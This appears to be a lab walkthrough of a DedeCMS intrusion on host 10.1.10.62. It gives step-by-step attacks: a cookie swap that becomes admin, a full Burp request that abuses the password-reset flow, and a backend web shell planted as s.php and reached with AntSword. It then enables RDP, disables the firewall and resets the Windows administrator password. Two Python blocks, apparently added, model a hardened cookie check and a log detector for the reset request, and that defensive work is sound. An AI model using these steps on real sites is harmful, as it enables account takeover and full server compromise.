The dedecms backend interface is as follows:
Directory scanning and robots.txt show content similar to the following; there is nothing useful to exploit there.
Backend login with weak passwords failed. Register a frontend account with username 0001 and password 111111, and do not fill in the security question.
After successful registration, visit http://10.1.10.62/member/index.php?uid=0001, and you will see the following interface.
Press F12 to view the webpage elements and copy the value of last_vid__ckMd5.
After copying the value of last_vid__ckMd5, log in to the account 0001.
Open the Cookies Manager and search for the site's IP address.
Modify the value of DedeUserID__ckMd5 to the content copied earlier. The original value before modification is as follows:
After modification, it should be as follows:
Change DedeUserID to 0001. After modifying both values, you can click Refresh and then close it.
Refresh the page, and it will become the admin user.
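The step above works because the check cookie copied from last_vid is accepted as the check cookie for DedeUserID, and the non-canonical id string 0001 is then coerced to the admin's uid 1. The following Python is an added example, not DedeCMS code: it models a signed-cookie check with a truncated HMAC (a stand-in construction, assumed for illustration; DedeCMS's own __ckMd5 scheme is not reproduced here) and shows the vulnerable check beside a hardened one that binds the MAC to the cookie name and only accepts the canonical decimal form of an id.

```python
import hmac
import hashlib
from typing import Dict, Optional

# Constructed demo secret; a real deployment keeps its cookie secret out of the code.
SECRET = b"constructed-demo-secret"


def check_value_vulnerable(value: str) -> str:
    """Check cookie derived from the value alone: a value signed for one cookie
    (last_vid) is equally valid for any other cookie (DedeUserID)."""
    return hmac.new(SECRET, value.encode(), hashlib.sha256).hexdigest()[:16]


def check_value_hardened(name: str, value: str) -> str:
    """Check cookie bound to the cookie name, so a last_vid check value
    cannot be replayed as the DedeUserID check value."""
    return hmac.new(SECRET, f"{name}\0{value}".encode(), hashlib.sha256).hexdigest()[:16]


def is_canonical_uid(value: str) -> bool:
    """Accept only the canonical decimal form: '1' yes; '0001', '+1', ' 1' no."""
    return value.isdigit() and str(int(value)) == value


def vulnerable_current_uid(cookies: Dict[str, str]) -> Optional[int]:
    """Accepts any string whose check cookie matches, then coerces it to int."""
    value = cookies.get("DedeUserID")
    mac = cookies.get("DedeUserID__ckMd5")
    if value is None or mac is None:
        return None
    if not hmac.compare_digest(check_value_vulnerable(value), mac):
        return None
    return int(value)  # "0001" silently becomes uid 1


def hardened_current_uid(cookies: Dict[str, str]) -> Optional[int]:
    """Rejects non-canonical ids before the MAC check and verifies a name-bound MAC."""
    value = cookies.get("DedeUserID")
    mac = cookies.get("DedeUserID__ckMd5")
    if value is None or mac is None or not is_canonical_uid(value):
        return None
    if not hmac.compare_digest(check_value_hardened("DedeUserID", value), mac):
        return None
    return int(value)


def forged_cookies(vulnerable: bool) -> Dict[str, str]:
    """Reproduces the cookie jar from the page: the server signed last_vid=0001 after a
    visit to ?uid=0001, and that check value was copied onto DedeUserID."""
    if vulnerable:
        last_vid_mac = check_value_vulnerable("0001")
    else:
        last_vid_mac = check_value_hardened("last_vid", "0001")
    return {
        "DedeUserID": "0001",
        "DedeUserID__ckMd5": last_vid_mac,
        "last_vid": "0001",
        "last_vid__ckMd5": last_vid_mac,
    }


if __name__ == "__main__":
    print("vulnerable:", vulnerable_current_uid(forged_cookies(True)))   # 1 (admin)
    print("hardened:  ", hardened_current_uid(forged_cookies(False)))    # None
```

Two properties close the hole independently: binding the MAC to the cookie name stops the last_vid check value from being reused, and refusing non-canonical ids (on both signing and verification) stops "0001" from ever being treated as uid 1. The hardened server should also canonicalize an id before it signs it, so that a visit to ?uid=0001 never yields a signed "0001" in the first place.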
Visit http://10.1.10.62/member/resetpassword.php and send the following request using Burp.
POST /member/resetpassword.php HTTP/1.1
Host: 10.1.10.62
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=7670a8ebb1cda24bd2e5ca30dc7a583d; DedeUserID=0001; DedeUserID__ckMd5=6ce7088fae0207fd; DedeLoginTime=1689920383; DedeLoginTime__ckMd5=41803202759b8e30; last_vtime=1689920439; last_vtime__ckMd5=46f2d368c54edcb0; last_vid=0001; last_vid__ckMd5=6ce7088fae0207fd; ENV_GOBACK_URL=%2Fmember%2Fcontent_list.php%3Fchannelid%3D1
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 53

dopost=safequestion&safequestion=0.0&safeanswer=&id=1
Pay attention to this link in the response and copy it:
http://10.1.10.62/member/resetpassword.php?dopost=getpasswd&amp;id=1&amp;key=H1nWnhNM
Remove the HTML-encoded amp; so the URL becomes:
http://10.1.10.62/member/resetpassword.php?dopost=getpasswd&id=1&key=H1nWnhNM
Access it in the browser.
You will directly go to the password change page.
Set the password to 666666.
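From the defender's side, the reset request above has a recognisable shape: dopost=safequestion with a non-integer safequestion value (0.0), an empty safeanswer, and id=1, followed by a getpasswd redemption for the same id. The Python below is an added detection example, not part of the original page; it assumes a reverse-proxy or WAF log that records the request body (ordinary Apache/Nginx access logs do not), in a constructed "ip method target body" line format, and flags these traits along with non-canonical id/uid parameters like the uid=0001 used earlier.

```python
from typing import List, Tuple
from urllib.parse import parse_qs, urlsplit

# Constructed sample log (format is an assumption: "client_ip method target body", body "-" if none).
# The first three requests mirror the page's reset flow and the uid=0001 visit; the fourth is benign.
SAMPLE_LOG = """\
10.1.10.50 POST /member/resetpassword.php dopost=safequestion&safequestion=0.0&safeanswer=&id=1
10.1.10.50 GET /member/resetpassword.php?dopost=getpasswd&id=1&key=H1nWnhNM -
10.1.10.52 GET /member/index.php?uid=0001 -
10.1.10.51 POST /member/resetpassword.php dopost=safequestion&safequestion=2&safeanswer=blue&id=42
"""


def is_canonical_int(value: str) -> bool:
    """'1' and '42' are canonical; '0.0', '0001', '' and '+1' are not."""
    return value.isdigit() and str(int(value)) == value


def classify(line: str) -> List[str]:
    """Returns the list of suspicious traits found in one log line (empty if none)."""
    ip, method, target, body = line.split(" ", 3)
    url = urlsplit(target)
    params = parse_qs(url.query, keep_blank_values=True)
    if method == "POST" and body != "-":
        params.update(parse_qs(body, keep_blank_values=True))

    def first(key: str) -> str:
        return params.get(key, [""])[0]

    findings = []
    # Non-canonical ids are the hallmark of the cookie/uid coercion trick.
    for key in ("id", "uid"):
        if key in params and not is_canonical_int(first(key)):
            findings.append(f"non-canonical {key}={first(key)!r}")

    if url.path == "/member/resetpassword.php":
        if first("dopost") == "safequestion":
            if not is_canonical_int(first("safequestion")):
                findings.append(f"non-canonical safequestion={first('safequestion')!r}")
            if first("safeanswer") == "":
                findings.append("empty safeanswer")
        elif first("dopost") == "getpasswd" and first("id") == "1":
            findings.append("reset key redeemed for id=1 (the admin account on this page)")
    return findings


def scan(log_text: str) -> List[Tuple[str, List[str]]]:
    """Runs classify over every line and returns (client_ip, findings) for lines that fired."""
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        findings = classify(line)
        if findings:
            alerts.append((line.split(" ", 1)[0], findings))
    return alerts


if __name__ == "__main__":
    for ip, findings in scan(SAMPLE_LOG):
        print(ip, "->", "; ".join(findings))
```

The same conditions translate directly into a WAF rule: a safequestion submission with an empty answer or a non-integer question id should be refused server-side rather than merely logged, and a reset-key redemption for a privileged account is worth an alert on its own.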
This is the password for the frontend admin user. Next, you need to change the password for the backend username.
Visit http://10.1.10.62/member/edit_baseinfo.php
You will be redirected to the complete information page. Simply click on "Complete Registration".
Once again, visit http://10.1.10.62/member/edit_baseinfo.php, and you will see the following page.
The original password is 666666, change it to 888888, fill in the verification code and email, and update successfully.
Access the backend and log in as admin/888888; the login succeeds.
Next, upload a shell through the backend.
Go to the file manager and create a new file.
Name the file s.php and write a shell into it.
The file is as follows:
Use AntSword to generate a base64-encoded connection.
If port 3389 is not open, you can upload the vbs script from the tool package to open the port.
Disable the firewall.
Change the administrator password.
Remote desktop login.